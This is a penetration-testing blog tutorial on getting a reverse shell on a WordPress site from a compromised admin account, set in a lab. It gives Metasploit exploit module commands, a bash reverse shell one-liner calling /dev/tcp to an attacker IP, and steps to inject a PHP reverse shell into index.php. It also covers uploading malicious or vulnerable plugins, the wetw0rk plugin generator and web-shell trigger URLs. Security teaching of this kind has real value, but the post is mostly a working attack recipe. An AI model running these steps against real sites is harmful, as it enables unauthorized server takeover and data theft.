Penetration Testing

WordPress: Reverse Shell

This post focuses on WordPress security testing to explore the procedures for exploiting WordPress by compromising the admin console. We have already set up WordPress on our local machine, but if you want to learn about WordPress installation and configuration, please visit the link below:

WordPress Lab Setup in Ubuntu

 As we know, WPScan is a standalone tool for identifying vulnerable plugins and themes in WordPress. However, this post will not cover a WPScan tutorial.

Table of Content

  • Metasploit Framework
  • Injecting Malicious code
  • Inject Malicious Plugin
  • Inject custom Malicious Plugin
  • WetW0rk – Malicious WordPress Plugin

Requirement:

Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: raj: 123 (in our case)

Let’s begin!!

As you can see, I have access to the WordPress admin console via the web browser. To obtain a web shell, we need to exploit this CMS. There are multiple methods to exploit WordPress; let’s explore some of these operations.

Metasploit Framework

The first method involves using the Metasploit framework. This module requires an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is an authenticated code execution by design, it should work on all versions of WordPress, resulting in a Meterpreter session to the webserver.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

Great! It works perfectly, and as you can see, we have successfully obtained a reverse connection to the web server via a Meterpreter session.

Injecting Malicious code

Another technique to spawn web server shells involves injecting malicious code. If you have an administrator’s username and password, log in to the admin panel and inject malicious PHP code into the index.php file, which is the entry point of the website.

To do this, navigate to the WordPress dashboard, click on “Plugins” in the left-hand menu, and then click “Add New.”

In the search bar, type “Advanced File Manager” and locate the plugin by “modalweb.”

Install and Activate the Plugin:

Click “Install Now” and then “Activate” to enable the plugin on your WordPress site.

Once activated, go to the “File Manager” option in the left-hand menu.

Use the file manager to navigate the file system of your WordPress installation. This interface allows you to view, upload, and edit files directly.

In WordPress, right-click on index.php and select “Edit.” Before making any changes, create a duplicate of the file so that you can restore it later if needed.

On kali, open and copy the code from /usr/share/webshells/php/php-reverse-shell.php

Paste the following code into the index.php file, updating the IP address with your Kali machine’s IP and the port number. Then click the ‘Save and Close’ button.

Next, open a terminal on your Kali machine and start Netcat:

rlwrap nc -lvnp 1234

Try accessing the wordpress page in another browser tab which should get us the reverse shell.

Inject Malicious Plugin

Sometimes, logged-on users may not have the necessary write permissions to modify the WordPress theme. In such cases, injecting a malicious WP plugin is an alternative strategy for acquiring a web shell.

Once you have access to the WordPress dashboard, you can attempt to install a malicious plugin. In this example, I have already downloaded a vulnerable plugin from Exploit DB.

Click here to download the plugin for practice.

Now that we have the ZIP file for the plugin, it’s time to upload it.

Dashboard > plugins > upload plugin

In the “Plugins” menu, click “Add New” and then “Upload Plugin”. Choose your malicious plugin ZIP file and click “Install Now”.

After uploading, click “Activate” to enable the plugin.

Once everything is properly set up, you can proceed with exploitation. We have installed a vulnerable plugin called “reflex-gallery,” which is known to be easily exploitable.

To exploit this vulnerability, you can use the Metasploit framework. Load the following module and execute the provided command:

use exploit/unix/webapp/wp_reflexgallery_file_upload
set rhosts 192.168.31.205
set targeturi /wordpress
exploit

After executing the above commands, you will establish a Meterpreter session. As demonstrated in this article, there are various methods to exploit a website built on the WordPress platform.

Inject custom Malicious Plugin

As demonstrated earlier, we uploaded a vulnerable plugin with a readily available exploit. This time, we will inject our custom-generated malicious plugin to obtain a reverse shell. The process is straightforward: we have saved the reverse shell’s malicious code in a PHP file named “revshell.php” and compressed it into a ZIP file.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")

Repeat the previous steps to upload the “revshell.zip” plugin file, then start a Netcat listener to establish a reverse connection to the target machine.

Once the package gets installed successfully, we need to activate the plugin.

As soon as you activate the plugin, it will establish a reverse connection, creating a Netcat session.

WetW0rk – Malicious WordPress plugin

 First, we need to download the malicious WordPress plugin from GitHub. This plugin contains the code necessary to exploit the WordPress installation.

Open a terminal on your Kali Linux machine and use the following command to clone the repository:

git clone https://github.com/wetw0rk/malicious-wordpress-plugin

Change to the directory containing the cloned repository.

Next, we need to generate the malicious plugin that will be uploaded to the WordPress site to exploit it.

Use the wordpwn.py script from the cloned repository to generate the plugin. Replace <Kali_IP> with your Kali machine’s IP address and 8888 with the desired port number:

python wordpwn.py <Kali_IP> 8888 Y

After running the script, make a note of the URLs provided for triggering the reverse shell. These URLs will be used later to establish the connection.

http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
http://(target)/wp-content/plugins/malicious/QwertyRocks.php
http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls

This script also starts metasploit framework as part of the process and would be waiting for the reverse shell.

Now that we have generated the malicious plugin, we can proceed with uploading it to the WordPress site to exploit it.

Upload the plugin as we did earlier.

Author: Phil Kalluri is a CyberSecurity and business automation consultant specializing in securing IT infrastructures and streamlining operations for SMBs, particularly in the healthcare and education sectors. Contact here